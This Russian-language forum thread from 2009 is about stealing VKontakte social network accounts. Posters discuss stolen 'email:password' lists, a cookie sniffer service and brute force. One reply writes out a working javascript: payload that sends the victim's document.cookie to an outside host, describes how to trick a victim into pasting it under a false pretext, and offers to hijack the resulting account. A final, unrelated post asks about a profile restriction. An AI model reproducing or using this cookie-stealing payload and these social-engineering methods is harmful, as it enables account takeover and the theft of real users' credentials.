p@SHOK"k-61O, seclub.org/forum/goto/7272708/ - да ты не понял .. красть акки я то умею .. но вот есть же проги которые используют уже наворованные списки "почта:пароль" ?? ну для отсылки сообщ. друзьям украденного акка, просмотра есть ли у него неиспользованные голоса, рейт какой ... и т.д. ...
pHaeTOn, есть такие проги, точнее не проги а скрипты на php, если знаешь этот язык можно даже придумать что нибудь интересное от себя. Так же есть спамер в exe
zvolodkyaz, 1) На каком именно сниффере ты зарегался? 2) Снифферы не варуют куки контакта, т.к. XSS прикрыты (по крайней мере мне этот способ не известен); 3) Проше украсть куки привязанного мыло, а дальше все просто; 4) Если ты на сниффере от хакер-про, то там в настройках есть готовые скрипты. 5) Так же на нем есть видео урок. Если есть какие то вопросы - обращайся, всегда рад помочь нагадить контакту.
p@SHOK"k-61O, мне короч нада взламать контакт.бутфорс,обман не помагает...а через снифер на хакер-про и видео скачал,но как взламать контакт не пойму...
zvolodkyaz, давай тогда поступим так. Ты впариваешь жертве это javascript:document.write("<script>img = new Image(); img.src = "mp4forum.ru/n931.gif?"+document.cookie;</script>") Под предлогом мол изменится интерфейс или что нить этакое. Говоришь мне ИД страницы, а я тебе логин и пароль.
Привет всем,у меня такая проблема:поменял имя в своем аккаунте Вконтакте на такое же,только транслитом,и появилось предупреждение,что"Информация на данной странице не соответствует реальности".Я вернул все,как было,но теперь обнаружил,что не могу поменять фотографию.Вопрос:сколько длится это ограничение?Извините,если пишу не в ту тему,подходящей не нашел.Заранее спасибо
2 апр 2009 в 17:36